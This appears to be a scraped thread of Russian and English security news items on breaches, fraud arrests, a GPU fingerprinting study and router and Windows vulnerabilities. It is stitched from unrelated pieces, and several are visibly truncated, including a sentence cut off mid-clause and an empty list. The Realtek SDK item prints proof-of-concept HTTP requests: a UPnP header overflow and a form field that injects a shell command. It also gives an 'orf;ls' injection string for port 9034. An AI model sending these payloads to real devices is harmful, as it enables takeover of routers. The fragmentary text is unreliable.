В CNN сообщили, что запрет на взлет был введен сразу после запуска северокорейской ракеты. Запрет на взлет был введен примерно на 15 минут с 17:30 по местному времени 10 числа. В 7:30 утра 11-го янворя по южнокорейскому времени прошло три минуты после того, как Северная Корея запустила ракету.
В частности, по сообщениям военных СМИ США, запрет на взлет был введен не только в аэропортах Западного побережья, но и в аэропортах Гавайев и Аризоны, и по радио диспетчерской были пойманы такие разговоры как "национальный запрет на взлет" и "угрозы национальной безопасности". "Национальный запрет на взлет" был первой мерой применен во время терактов 11 сентября 2001 года.
По этой причине некоторые аналитики считают, что Северная Корея могла выпустить ошибочное предупреждение сразу после запуска ракеты. Говорят, что даже во время ракетных учений России в 2020 году была объявлена тревога, когда было ошибочно решено, что ракета выпущена по авиабазе США в Германии.
Однако, как сообщает CNN североамериканского командования воздушно-космической обороны(NORAD) заявили, что никогда не предупреждали о потенциальной угрозе для США в связи с запуском северокорейской ракеты. Когда обнаруживается пуск северокорейской ракеты, NORAD немедленно оценивает, представляет ли она угрозу для материковой части США, и FAA также отправляется в ситуационный центр NORAD. Передовали, что вероятность падения низкая.
Некоторые обсуждают возможность взлома. В январе прошлого года CBS сообщила, что на диспетчерскую вышку в Нью-Йорке было получено фальшивое радио с машинным звуком, в котором говорилось : «Мы летим в Капитолию», ссылаясь на месть за Касема Сулеймани, командующего иранскими силами Корпуса стражей исламской революции, который погиб в результате американского авиаудара.
Группа исследователей из университета имени Бен-Гуриона, университета Лилль и университета Аделаиды изучила возможность использования графических процессоров для создания уникальных цифровых отпечатков и их использования в целях web-слежки.
Результаты крупномасштабного эксперимента с участием 2550 устройств с 1605 различными конфигурациями ЦП показывают, что метод под названием DrawnApart может увеличить медианную продолжительность отслеживания до 67% по сравнению с современными методами.
Исследователи рассмотрели возможность создания отличительных цифровых отпечатков на основе GPU (графического процессора) отслеживаемых систем с помощью WebGL (Web Graphics Library). WebGL — кроссплатформенный API для рендеринга 3D-графики в браузере. Используя данную библиотеку, система отслеживания DrawnApart может подсчитывать количество и скорость исполнительных блоков в графическом процессоре, измерять время, необходимое для завершения рендеринга вершин, обрабатывать функции остановки и многое другое.
DrawnApart использует короткие программы GLSL, выполняемые целевым графическим процессором как часть вершинного шейдера, чтобы решить проблему наличия случайных исполнительных блоков, обрабатывающих вычисления. Следовательно, распределение рабочей нагрузки предсказуемо и стандартизировано.
Команда разработала как метод измерения на экране, который выполняет небольшое количество операций с интенсивными вычислениями, так и метод вне экрана, подвергающий графический процессор более длительному и менее интенсивному тестированию.
Процесс генерирует следы, состоящие из 176 измерений, сделанных в 16 точках, которые используются для создания цифрового отпечатка. Даже при визуальной оценке отдельных необработанных следов можно заметить отчетливые временные различия между устройствами.
Исследователи также попытались поменять местами другие аппаратные части на системах с целью проверить, останутся ли следы различимыми, и обнаружили, что цифровые отпечатки зависят исключительно от графического процессора. Даже если набор интегральных схем создается с помощью идентичного производственного процесса, имеет одинаковую номинальную вычислительную мощность, количество процессорных блоков и точно такие же ядра и архитектуру, каждая схема немного отличается из-за обычной изменчивости производства.
Они неразличимы в обычных повседневных операциях, но они могут стать полезными в контексте сложной системы отслеживания, такой как DrawnApart, которая специально разработана для запуска функциональных аспектов, выделяя их.
Автономный алгоритм отслеживания может обеспечить среднее время слежки 17,5 дня, но с помощью цифровых отпечатков графического процессора это время увеличивается до 28 дней. Оценка была основана на условиях тестирования, при которых диапазон рабочих температур графического процессора составляет от 26,4 °C до 37 °C, без колебаний напряжения.
Помимо этих условий, на DrawnApart не влияют изменения рабочей нагрузки, полезная нагрузка графического процессора с других вкладок браузера, перезагрузка системы и другие изменения во время выполнения.
Потенциальные меры противодействия новому методу снятия отпечатков включают изменение значения атрибута, предотвращение параллельного выполнения, блокировку скриптов, блокировку API и предотвращение измерения времени.
Промышленный консорциум Khronos Group, разработавший WebGL API, получил отчет исследователей и сформировал группу технических специалистов для обсуждения возможных решений с поставщиками браузеров и другими заинтересованными сторонами.
• Source: https://arxiv.org/pdf/2201.09956.pdf
Источник: https://mainichi.jp/english/articles/20241103/p2g/00m/0na/032000c
TOKYO (Kyodo) — Японское правительство вряд ли представит запланированный законопроект по усилению кибербезопасности до конца года, сообщил в воскресенье источник в правительстве, поскольку обсуждения приостановились после смены премьер-министра в прошлом месяце и поражения правящей партии на общих выборах.
Законопроект, изначально запланированный для представления на внеочередной сессии парламента осенью, направлен на внедрение "активной киберзащиты" — подхода, позволяющего мониторить и выявлять признаки кибератак на государственные органы и критическую инфраструктуру, а при необходимости — нарушать работу вражеских серверов с помощью компьютерных вирусов для их нейтрализации.
Среди вопросов, которые необходимо решить, — опасения, что активная киберзащита, которая будет включать мониторинг коммуникаций в обычных условиях, может нарушить конституционную гарантию тайны связи.
Всего через несколько дней после того, как экспертная группа составила промежуточный отчет 6 августа о способах улучшения кибербезопасности, тогдашний премьер-министр Фумио Кисида объявил, что не будет участвовать в выборах лидера Либерально-демократической партии в сентябре, что сигнализировало о его уходе с поста.
С тех пор больше встреч не проводилось.
Политическая обстановка также стала неопределенной после того, как Сигэру Исиба, который сменил Кисиду, столкнулся с сокрушительным поражением правящей коалиции LDP и Komeito на общих выборах 27 октября, что побудило блок искать партнеров среди оппозиции для обеспечения большинства для принятия законопроектов.
"Координация внутри правительства не прекращалась. Наиболее ранняя подача законопроекта возможна на следующей регулярной сессии парламента", — сказал бывший министр обороны.
Один из правительственных чиновников отметил, что правящая коалиция сейчас "меньшинственное правительство, которое полностью сосредоточено на обеспечении поддержки оппозиции для принятия дополнительного бюджета на 2024 финансовый год".
Также появились слухи внутри LDP о том, что импульс для реализации инициативы по киберзащите ослабевает, особенно учитывая, что бывший генеральный секретарь LDP Акира Амари, который выступал за эту политику, потерял свое место на выборах в Палату представителей.
Выборная платформа LDP подчеркивала необходимость повышения уровня кибербезопасности Японии до уровня Соединенных Штатов и крупных европейских стран, в том числе через внедрение активной киберзащиты.
Сотрудники отделения по противодействию киберпреступности Октябрьского РУВД Минска совместно с коллегами из Молодечненского РОВД выявили схему незаконного оборота средств платежа, организованную 21-летним жителем райцентра.
Молодой человек предложил своему 22-летнему брату и двум друзьям оформить на их имена банковские карты. Те согласились и продали фигуранту их реквизиты за 200 рублей. Тот в свою очередь за еще большее вознаграждение передал чужие данные дальше по преступной цепи. Впоследствии карточки использовались для хищения денег обманутых белорусов.
Молодой человек был задержан. Известно, что он также попал в поле зрения российских правоохранителей: во время поездки в соседнюю страну подрабатывал курьером телефонных мошенников.
Когда преступная схема была вскрыта, один из дропов признался оперативникам, что у него возникли сомнения в законности такого заработка, однако дроповод был настойчив и убедил его в обратном.
Возбуждено уголовное дело за незаконный оборот средств платежа.
В результате проведения комплекса оперативно-розыскных мероприятий и следственных действий сотрудниками УБК ГУ МВД России по Новосибирской области при силовой поддержке спецподразделения Управления Росгвардии по Новосибирской области пресечена деятельность группы лиц, которые с помощью использования информационно-телекоммуникационных технологий осуществляли неправомерный доступ в личные кабинеты в системах дистанционного банковского обслуживания граждан.
Подозреваемые оформляли на них кредиты, затем создавали виртуальные карты и бесконтактным способом снимали денежные средства в банкоматах.
Общая сумма ущерба составила более 700 тысяч рублей.
В состав преступной группы входили трое жителей Новосибирска и Новосибирской области в возрасте от 18 до 28 лет.
В ходе проведения обысков по местам проживания подозреваемых, сотрудники полиции изъяли 6 единиц компьютерной техники, 11 банковских карт, 11 телефонов, 82 сим-карты, денежные средства в размере более 700 тысяч рублей.
По данному факту следователем отдела полиции № 5 «Дзержинский» УМВД России по городу Новосибирску возбуждено уголовное дело по признакам преступления предусмотренного, ч. 3 ст. 158 УК РФ. В отношении одного из фигурантов решается вопрос об избрании меры пресечения, в отношении еще двух избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
Проводятся следственные действия и оперативно-розыскные мероприятия, направленные на установление дополнительных эпизодов противоправной деятельности участников преступной группы.
• Video: https://мвд[.]рф/news/item/54275024/
Мошенничество с продажей авто и дронов для ВСУ на более 46 млн грн - в результате совместной украино-молдавской операции в Молдове задержаны 9 участников преступной группировки
В рамках международного сотрудничества правоохранители Украины и Республики Молдова на территории Молдовы пресекли деятельность преступной группировки, которая путем обмана завладела средствами военнослужащих ВСУ, их семей и волонтеров под видом продажи автомобилей и дронов через интернет. С этой целью Офис Генерального прокурора и Прокуратура по борьбе с организованной преступностью и особым делам Республики Молдова создали совместную следственную группу.
Сейчас правоохранители Республики Молдова сообщили о подозрении в мошенничестве 9 гражданам Украины (ч. 6 ст. 190 Уголовного кодекса Республики Молдова).
Установлено, что жители Одесской области - члены двух семей после начала полномасштабного вторжения РФ переехали в Молдову и в течение 2023-2024 годов, размещали объявления о продаже автомобилей и дронов из-за рубежа для нужд Вооруженных Сил Украины. Такие объявления публиковали на онлайн платформах «OLX», «Bon.Ua», «Avto-Ria».
Покупателям предлагали внести предоплату на банковскую карту, а после получения денег продавцы на связь не выходили.
По состоянию на настоящее время установлено 67 эпизодов мошенничества. Приблизительная сумма убытков составляет 46 млн грн.
Установлено не менее 27 участников преступной группировки, большинство из них находятся на территории Республики Молдова. Правоохранителями принимаются меры для их задержания.
На территории Республики Молдова проведены 23 обыски, изъято около 61 тыс долларов США, 20 элитных автомобилей, около 5 кг золота.
На территории Украины проведено 13 обысков, в ходе которых изъято 3 автомобиля
В настоящее время 8 из 9 подозреваемых в Республике Молдова избраны меры пресечения в виде содержания под стражей без возможности внесения залога.
Досудебное расследование продолжается.
• Source: https://kyiv.gp.gov[.]ua/ua/news.html?_m=publications&_c=view&_t=rec&id=367374
• Video:
Европол сообщил о взломе портала Europol Platform for Experts (EPE). В настоящее время правоохранители проводят расследование инцидента, так как хакеры уже заявили о краже документов под грифом «Только для служебного пользования» (For Official Use Only, FOUO), содержащих секретные данные.
EPE представляет собой онлайн-платформу, которую используют эксперты правоохранительных органов для «обмена знаниями, передовым опытом и неперсонализированными данными о преступлениях».
Представители Европола подчеркнули, что инцидент затронул только EPE, а «никакая оперативная информация в EPE не обрабатывается, основные системы Европола не были затронуты, и никакие оперативные данные не были скомпрометированы».
В настоящее время портал EPE отключен, и сообщение на сайте гласит, что сервис недоступен из-за технического обслуживания.
Хакер под ником IntelBroker взял на себя ответственность за взлом Европола и утверждает, что похитил файлы FOUO, а также документы, содержащие секретные данные. По его словам, были украдены сведения о сотрудниках Европола, исходные коды, PDF-файлы, документы разведки и инструкции, которые он уже выставил на продажу.
Также он заявил, что получил доступ к EC3 SPACE (Secure Platform for Accredited Cybercrime Experts), одному из сообществ на портале EPE, где размещены сотни материалов, связанных с киберпреступностью, которыми пользуются более 6000 экспертов со всего мира, включая:
IntelBroker утверждает, что скомпрометировал и платформу SIRIUS, используемую судебными и правоохранительными органами из 47 стран мира (включая страны ЕС, Великобританию, страны, имеющие соглашение о сотрудничестве с Евроюстом, а также Европейскую прокуратуру). Платформа используется для доступа к международным цифровым уликам в контексте разных уголовных расследований и разбирательств.
Хакер опубликовал скриншоты пользовательского интерфейса EPE, а также слил небольшой образец БД EC3 SPACE, содержащий 9128 записей. Судя по всему, в дамп вошла личная информация сотрудников правоохранительных органов и ИБ- специалистов, имеющих доступ к EC3 SPACE.
США предъявили обвинения двум российским хакерам в краже и отмывании сотен тысяч биткоинов с криптобирж Mt. Gox и BTC-e.
США предъявили обвинения двум гражданам России в причастности к одному из крупнейших хакерских нападений на криптовалютную индустрию. Алексей Билюченко и Александр Вернер обвиняются во взломе японской биржи Mt. Gox в 2011 году и отмывании похищенных биткоинов через незаконную платформу BTC-e.
По данным Министерства юстиции США, расследование стало результатом сотрудничества нескольких правоохранительных органов, включая ФБР и Секретную службу США. Обвиняемые являются частью группы хакеров, которая получила несанкционированный доступ к серверу Mt. Gox, на котором хранились криптовалютные кошельки клиентов биржи. В результате они украли около 647 тыс. биткоинов, на сегодняшний день стоимостью более 25 миллиардов долларов.
Большая часть украденных биткоинов была затем отмыта через две другие онлайн- биржи, а также через некого нью-йоркского брокера, который помогал им переводить миллионы долларов на офшорные счета под видом контракта на оказание рекламных услуг. Взлом Mt. Gox привел к закрытию биржи в 2014 году и значительным убыткам для ее клиентов, которые до сих пор ждут компенсации.
Кроме того, Билюченко обвиняется в сотрудничестве с Александром Винником и другими лицами в управлении биржей BTC-e, которая с 2011 по 2017 год служила центром для переводов, отмывания и хранения доходов от незаконной деятельности для киберпреступников со всего мира. BTC-e была закрыта в 2017 году после ареста Винника в Греции по запросу США.
Обоим предъявлены обвинения в сговоре с целью отмывания денег, а Билюченко еще отдельно в ведении нелицензированного бизнеса по оказанию денежных услуг. Все обвиняемые считаются невиновными, пока их вина не будет доказана в суде.
Mt. Gox и BTC-e были двумя известными криптовалютными биржами, которые
прекратили свою деятельность в результате хакерских атак и правоохранительных
действий.
Mt. Gox была крупнейшей биржей биткоинов в мире с 2010 по 2014 год,
обрабатывая более 70% всех транзакций с биткоинами. В 2011 году она была
взломана неизвестными хакерами, которые украли около 647 тыс. биткоинов со
счетов клиентов биржи. В 2014 году биржа объявила о своем банкротстве и
закрытии.
BTC-e была незаконной криптовалютной платформой, основанной в 2011 году россиянами Алексеем Билюченко и Александром Вернером. Она служила центром для переводов, отмывания и хранения доходов от незаконной деятельности для киберпреступников со всего мира. Она также использовала часть украденных биткоинов с Mt. Gox для своей работы. В 2017 году она была закрыта, а ее серверы и активы были арестованы ФБР.
В компонентах Realtek SDK, который используется различными производителями беспроводных устройств в своих прошивках, [выявлены](https://www.iot- inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/) четыре [уязвимости](https://www.realtek.com/images/safe- report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf), позволяющие неаутентифицированному атакующему удалённо выполнить код на устройстве с повышенными привилегиями. По предварительной оценке, проблемы затрагивают как минимум 200 моделей устройств от 65 различных поставщиков, включая различные модели беспроводных маршрутизаторов Asus, A-Link, Beeline, Belkin, Buffalo, D-Link, Edison, Huawei, LG, Logitec, MT-Link, Netgear, Realtek, Smartlink, UPVEL, ZTE и Zyxel.
Проблема охватывает различные классы беспроводных устройств на базе SoC RTL8xxx, от беспроводных маршрутизаторов и усилителей Wi-Fi, до IP-камер и умных устройств для управления освещением. В устройствах на базе чипов RTL8xxx используется архитектура, подразумевающая установку двух SoC - на первом устанавливается прошивка производителя на базе Linux, а на втором выполняется отдельное урезанное Linux-окружение с реализацией функций точки доступа. Начинка второго окружения базируется на типовых компонентах, предоставляемых компанией Realtek в SDK. Указанные компоненты в том числе обрабатывают данные, поступающие в результате отправки внешних запросов.
Уязвимости затрагивают продукты, в которых используются Realtek SDK v2.x, Realtek "Jungle" SDK v3.0-3.4 и Realtek "Luna" SDK до версии 1.3.2. Исправление уже выпущено в обновлении Realtek "Luna" SDK 1.3.2a, а также готовятся к публикации патчи для Realtek "Jungle" SDK. Для Realtek SDK 2.x исправления выпускать не планируется, так как сопровождение данной ветки уже прекращено. Для всех уязвимостей предоставлены рабочие прототипы эксплоитов, позволяющие добиться выполнения своего кода на устройстве.
Выявленные уязвимости (первым двум присвоен уровень опасности 8.1, а остальным
CVE-2021-35392 - переполнение буфера в процессах mini_upnpd и wscd, реализующих функциональность "WiFi Simple Config" (mini_upnpd занимается обработкой пакетов SSDP, а wscd кроме поддержки SSDP занимается обслуживанием запросов UPnP на базе протокола HTTP). Атакующий может добиться выполнения своего кода через отправку специально оформленных UPnP-запросов "SUBSCRIBE" со слишком большим значением номера порта в поле "Callback".
Code:Copy to clipboard
SUBSCRIBE /upnp/event/WFAWLANConfig1 HTTP/1.1
Host: 192.168.100.254:52881
Callback: <http://192.168.100.2:36657AAAAAA*AAAAAAA/ServiceProxy0>
NT: upnp:event
CVE-2021-35393 - уязвимость в обработчиках "WiFi Simple Config", проявляющаяся при использовании протокола SSDP (использует UDP и формат запросов, похожий на HTTP). Проблема вызвана использованием фиксированного буфера, размером 512 байт, при обработке параметра "ST:upnp" в сообщениях M-SEARCH, отправляемых клиентами для определения наличия сервисов в сети.
CVE-2021-35394 - уязвимость в процессе MP Daemon, отвечающем за выполнение операций диагностики (ping, traceroute). Проблема позволяет осуществить подстановку своих команд из-за недостаточной проверки аргументов при выполнении внешних утилит.
CVE-2021-35395 - серия уязвимостей в web-интерфейсах на базе http-серверов /bin/webs и /bin/boa. В обоих серверах выявлены типовые уязвимости, вызванные отсутствием проверки аргументов перед запуском внешних утилит функцией system(). Отличия сводятся только к использованию для атаки разных API. Оба обработчика не включали защиту от атаки CSRF и техники "DNS rebinding", позволяющей организовать отправку запросов из внешней сети при ограничении доступа к интерфейсу только для внутренней сети. В процессах также по умолчанию использовалась предопределённая учётная запись supervisor/supervisor. Кроме того, в обработчиках выявлено несколько переполнений стека, проявляющихся при отправке аргументов слишком большого размера.
Code:Copy to clipboard
POST /goform/formWsc HTTP/1.1
Host: 192.168.100.254
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;ifconfig>/tmp/1;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
Дополнительно отмечается выявление ещё нескольких уязвимостей в процессе UDPServer. Как оказалось одна из проблем уже была обнаружена другими исследователями ещё в 2015 году, но не была полностью исправлена. Проблема вызвана отсутствием должной проверки аргументов, передаваемых в функцию system() и может быть эксплуатирована отправкой на сетевой порт 9034 строки вида 'orf;ls'. Кроме того, в UDPServer выявлено переполнение буфера из-за небезопасного использования функции sprintf, которое также потенциально может применяться для совершения атак.
"В 2020 году сотни жителей Эстонии стали жертвами действующих в интернете мошенников. Для выманивания денег преступники используют разные схемы, от бесплатных щенков и неожиданного наследства до фишинговых писем и приложений для знакомств. Но наибольший материальный ущерб был нанесен инвестиционными мошенничествами, более 5,6 млн евро. Также многие люди лишились своих сбережений, попав на удочку липового работника банка", — говорит руководитель службы по борьбе с мошенничествами и экономическими преступлениями криминального бюро Пыхьяской префектуры Пауль Пихельгас.
В прошлом году полиция зарегистрировала 170 случаев мошенничеств, когда людям предлагали хорошо заработать на бирже или инвестировать в крипто-валюту, с общим ущербом более чем 5,6 млн евро. В январе этого года прибавилось еще 19 таких случаев, ущерб составил почти 136 000 евро.
С июля прошлого года начала распространяться и схема, когда жителям Эстонии звонят русскоязычные люди от имени местных банков и убеждают жертв, что на их банковских счетах происходят какие-либо махинации и для предотвращения этого нужны разные данные, например, номер пользователя, номер и CVC-код кредитной карты, а также просят ввести PIN-коды Smart-ID или Mobiil-ID, чем жертва, сама того не подозревая, подтверждает перевод своих денег на чужой счет.
В прошлом году из-за такого мошенничества в полицию обратилось 193 человека, которым был причинен ущерб в сумме более 624 000 евро. В январе полиция зарегистрировала еще 50 таких преступлений с общим ущербом в 239 000 евро.
Пауль Пихельгас подчеркивает, что для предотвращения таких мошенничеств крайне важно уметь защищать свои личные данные. "Никто из нас не дал бы чужому человеку свой кошелек, таким же образом нельзя и пускать незнакомцев к себе в компьютер. Мошенники попадают в компьютер жертвы, попросив установить программы AnyDesk или TeamViewer, таким образом получают доступ к данным жертвы, интернет-банку и деньгам. Также нельзя передавать незнакомым людям в телефонной беседе данные своего банковского счета или вводить по чьей-то просьбе PIN-коды. Не имеет значения, кем представляется звонящий или насколько убедительно говорит, PIN-коды можно вводить только в случае тех сделок, инициатором которых были вы сами", — добавляет Пихельгас.
Пихельгас говорит, что жертвой мошенника могут стать представители всех возрастов, но пожилым людям иногда сложнее отказать назойливому собеседнику.
"Иногда человек чувствует себя обязанным пойти навстречу просьбам звонящего, особенно если предлагают "инвестировать" или установить "дополнительную защиту на банковский счет". Некоторым людям неудобно отказать или прервать звонок, когда кто-то с ним долго говорил и как бы потратил свое время. Но такие звонки приносят мошенникам хороший заработок и они готовы общаться часами, днями и даже месяцами, главное, чтобы удалось заполучить ваши деньги. Было бы уместно еще раз обговорить эти темы в кругу семьи, при необходимости пересмотреть, например, дневные лимиты на переводы и оценить, нужен ли в смартфоне Mobiil-ID или Smart-ID, если человек этими приложениями на самом деле не пользуется", — советует полицейский.
Сотрудники полиции задержали подозреваемого в хищении 7 млн рублей у мужчины при попытке купить криптовалюту в ресторане в центре Москвы. Об этом ТАСС в четверг сообщил источник в правоохранительных органах.
"9 февраля задержан уроженец Темрюка Краснодарского края, который изобличен в хищении 7 млн рублей у мужчины в ресторане в Шмитовском проезде, дом 3, строение 1, при намерении купить криптовалюту. Задержанный дал признательные показания", - сказал собеседник агентства.
Источник отметил, что в ходе разбирательства установлено, что злоумышленник ввел в заблуждение пострадавшего, предложив ему заключить сделку купли-продажи криптовалюты. В ресторане в центре Москвы мужчина передал задержанному указанную сумму, после чего тот с еще одним неизвестным под видом необходимости пересчета денег в условиях конфиденциальности ушли из зала заведения, а затем скрылись.
По данному факту возбуждено уголовное дело по статье о мошенничестве (ч. 4 ст. 159 УК РФ), подозреваемый арестован.
A wormable vulnerability in the HTTP Protocol Stack of the Windows IIS server can also be used to attack unpatched Windows 10 and Server systems publicly exposing the WinRM (Windows Remote Management) service.
Microsoft already patched the critical bug tracked as CVE-2021-31166 during the May Patch Tuesday.
Luckily, although it can be abused by threat in remote code execution (RCE)
attacks, the vulnerability ONLY impacts versions 2004 and 20H2 of Windows 10
and Windows Server.
Microsoft [recommended prioritizing
patching](https://msrc.microsoft.com/update-
guide/vulnerability/CVE-2021-31166#faq) all affected servers because the
vulnerability could allow unauthenticated attackers to execute arbitrary code
remotely "in most situations" on vulnerable computers.
Adding to this, over the weekend, security researcher Axel Souchet has published proof-of-concept exploit code that can be used to crash unpatched systems using maliciously crafted packets by triggering blue screens of death.
The bug was found in the HTTP Protocol Stack (HTTP.sys) used as a protocol listener by the Windows IIS web server for processing HTTP requests.
However, as discovered by security researcher Jim DeVries, it also impacts Windows 10 and Server devices running the [WinRM](https://docs.microsoft.com/en- us/windows/win32/winrm/portal) service (short for Windows Remote Management), a component of the Windows Hardware Management feature set which also makes use of the vulnerable HTTP.sys.
While home users have to enable the WinRM service manually on their Windows 10 systems, enterprise Windows Server endpoints have WinRM toggled on by default which makes them vulnerable to attacks if they're running versions 2004 or 20H2.
"[CVE-2021-31166] is commonly used in corporate environments. It's enabled by default on servers," DeVries told bleepingcomputer[.]
"I don't think this is a big risk for home PCs but, should someone marry this to a worm and ransomware, it could run wild in corporate environments."
I finally found time to answer my own question. WinRM IS vulnerable. This really expands the number of vulnerable systems, although no one would intentionally put that service on the internet.
— Jim DeVries (@JimDinMN) May 19, 2021Click to expand...
DeVries' findings have also been confirmed by CERT/CC vulnerability analyst Will Dormann who successfully crashed a Windows system exposing the WinRM service using Souchet's DoS exploit.
Dormann also discovered that over 2 million Windows systems reachable over the Internet are exposing the vulnerable WinRM service.
Luckily, only a subset of all these Internet-exposed Windows systems is vulnerable seeing that the vulnerability only impacts Windows 10 and Windows Server, versions 2004 and 20H2.
Windows
systems exposing WinRM online (Will Dormann)
The exploit's release could likely enable adversaries to create their own
exploits faster, potentially also allowing remote code execution.
However, the impact should also be limited and the patching process quite quick since most home users using affected Windows 10 versions have probably updated their systems last week.
Similarly, many companies should likely be safe from attacks targeting the bug since they don't usually deploy the latest Windows Server versions as soon as they are released.
repositories containing some components used by Azure, Intune, and Exchange.
Microsoft announced that the threat actors behind the
[SolarWinds](https://securityaffairs.co/wordpress/112294/hacking/solarwinds-
sec-filing.html) supply chain attack could have had access to repositories
containing the source code for a limited number of components used by Azure,
Intune, and Exchange.
n December, Microsoft experts
[revealed](https://securityaffairs.co/wordpress/112847/apt/solarwinds-
microsoft-source-code.html) that
[SolarWinds](https://securityaffairs.co/wordpress/112416/hacking/microsoft-
breached-solarwinds-hack.html) hackers could have compromised a small number
of internal accounts and used at least one of them to view source code in a
number of source code repositories.
Shortly after the disclosure of the SolarWinds attack, Microsoft confirmed
that it was one of the companies breached in the recent supply chain attack,
but the IT giant denied that the nation-state actors compromised its software
supply-chain to infect its customers.
Frank Shaw, the corporate vice president of communications at Microsoft,
confirmed that its company detected multiple malicious SolarWinds binaries in
its environment.
The good news is that accounding an investigation update provided by Microsoft the attackers hackers only viewed a few individual files.
However, for some repositories, including ones for Azure, Intune, and Exchange, the attackers could download [component](https://docs.microsoft.com/en- us/exchange/architecture/architecture?view=exchserver-2019) source code.
“There was no case where all repositories related to any single product or service was accessed. There was no access to the vast majority of source code. For nearly all of code repositories accessed, only a few individual files were viewed as a result of a repository search. _For a small number of repositories, there was additional access, including in some cases, downloading component source code.” reads the update provided by Microsoft.
“These repositories contained code for:_
The IT giant revealed that attackers used search terms in an attempt to find secrets, such as login credentials to use for lateral movements in the corporate networks.
Microsoft added that its development policy prohibits secrets in code, it uses automated tools to verify compliance.
“Because of the detected activity, we immediately initiated a verification process for current and historical branches of the repositories. We have confirmed that the repositories complied and did not contain any live, production credentials.” continues the company.
The SolarWinds attack demonstrated the importance of embracing a Zero Trust mindset and protecting privileged credentials.
“A Zero Trust, “assume breach” philosophy is a critical part of defense. Zero Trust is a transition from implicit trust—assuming that everything inside a corporate network is safe—to the model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data.” concludes Microsoft.
Федеральное жюри присяжных в Гринсборо, штат Северная Каролина, осудило сегодня жителя Флориды за его ведущую роль в международном заговоре с целью проникновения в дома граждан США, насильственного похищения и нападения на них, а также кражи их биткоинов и других криптовалют.Согласно судебным документам и доказательствам, представленным на суде, 24-летний Реми Сент- Феликс ( Remy St Felix ) из Уэст-Палм-Бич был лидером банды грабителей, которые нападали на владельцев криптовалют с помощью насильственных вторжений в дома. В период с сентября 2022 по июль 2023 года Сент-Феликс помог спланировать и организовать серию ограблений в Дареме, Северная Каролина, Флориде, Техасе и Нью-Йорке. Жертвы вторжений в дома Святого Феликса были похищены в их собственных домах и им было приказано получить доступ к своим криптовалютным счетам и слить их средства.
“Сент-Феликс и его сообщники преследовали жертв по всей территории Соединенных Штатов за жестокие вторжения в дома, похищения людей и грабежи с целью кражи криптовалюты”, - заявила первый заместитель помощника генерального прокурора Николь М. Арджентьери, глава уголовного отдела Министерства юстиции. “Хотя участники этого жестокого заговора пытались замести следы с помощью зашифрованных сообщений и анонимных финансовых транзакций, они не были вне досягаемости наших преданных своему делу следователей и прокуроров. Сегодняшний вердикт присяжных — последний из более чем десятка обвинительных приговоров по этому делу — должен послужить еще одним напоминанием о том, что Уголовный отдел и его партнеры привержены привлечению насильственных преступников к ответственности, независимо от того, насколько технически сложными могут быть их преступления”.
source: justice[.]gov/opa/pr/man-convicted-violent-home-invasion-robberies- steal-cryptocurrency
Компания Dropbox сообщила, что хакеры проникли в производственные системы платформы Dropbox Sign eSignature и получили доступ к токенам аутентификации, данным многофакторной аутентификации (МФА), хешированным паролям и информации о клиентах.
Dropbox Sign (ранее HelloSign) — это платформа электронной подписи, позволяющая клиентам хранить, отправлять и подписывать документы онлайн, причем подписями, имеющими юридическую силу.
24 апреля 2024 года специалисты Dropbox обнаружили несанкционированный доступ к производственным системам DropBox Sign и начали расследование. Оказалось, злоумышленники каким-то образом получили доступ к автоматизированному инструменту для настройки системы Dropbox Sign, который является частью бэкэнд-сервисов платформы.
С помощью этого инструмента хакеры смогли запускать приложения и автоматизированные сервисы с повышенными привилегиями, что позволило им добраться до базы данных клиентов.
«В ходе дальнейшего расследования мы обнаружили, что злоумышленники получили доступ к данным, в том числе информации о клиентах Dropbox Sign, включая адреса электронной почты, имена пользователей, номера телефонов и хешированные пароли, а также общие настройки аккаунтов и некоторые аутентификационные данные (такие как ключи API, токены OAuth и МФА)», — сообщают в Dropbox.
Click to expand...
Отмечается, что даже люди, которые пользовались платформой Dropbox Sign eSignature, но не создавали аккаунт, тоже пострадали, в их случае утекли адреса электронной почты и имена.
В компании заявляют, что не обнаружили никаких доказательств того, что злоумышленники получили доступ к документам, соглашениям или платежной информации клиентов, а также не имели доступа к системам других сервисов компании. Подчеркивается, что «инфраструктура Dropbox Sign в значительной степени отделена от других сервисов Dropbox».
В настоящее время DropBox сбросила пароли всех пользователей, завершила все сеансы Dropbox Sign и ограничила использование API-ключей до тех пор, пока те не будут заменены клиентами. Теперь компания рассылает электронные письма всем пользователям, которых затронул этот инцидент.
Также клиентам Dropbox Sign рекомендуется остерегаться возможных фишинговых кампаний, которые могут использовать украденные данные для сбора конфиденциальной информации (например, паролей).
Щедрое вознаграждение или международное преследование – выбор за злоумышленником.
Взломщику биржи Poloniex, который недавно украл $114 млн, предложили щедрое вознаграждение за возврат украденных средств до 25 ноября 2023г. В противном случае его ждёт преследование со стороны правоохранительных органов нескольких стран.
По данным компании PeckShield , занимающаяся безопасностью и аналитикой блокчейнов, команда Poloniex успешно идентифицировала лицо, ответственное за кибервторжение 10 ноября.
Владелец криптобиржи Джастин Сан отправил сообщение хакеру через транзакцию на блокчейне, направленную на цифровой адрес злоумышленника, предложив последнему вознаграждение в размере $10 млн за возврат средств.
Сообщение было составлено на китайском, английском, русском и корейском языках. В нем отмечается, что в деле уже задействованы «полицейские силы» из Китая, США и России. По словам предпринимателя, все средства, украденные в результате взлома, были помечены для отслеживания, поэтому их нельзя использовать. Хакеру дали срок до 25 ноября 2023 года, чтобы вернуть украденные средства. В обмен он получит вознаграждение, а в случае несоблюдения срока полиция нескольких стран начнёт его поиск.
Один из пользователей предложил Сану помощь в идентификации злоумышленника взамен на возмещение 386 ETH, потерянных при взломе DeFi-протокола Euler Finance на $196 млн в марте.
«Хакер не из России, он из Польши», — отметил он, намекая на имеющиеся данные.
В середине ноября Poloniex столкнулась с крупным кибернападением, в результате которого было потеряно свыше $100 млн. После взлома Джастин Сан предложил хакеру оставить себе 5% украденных средств, если он вернёт их добровольно, но злоумышленник не ответил.
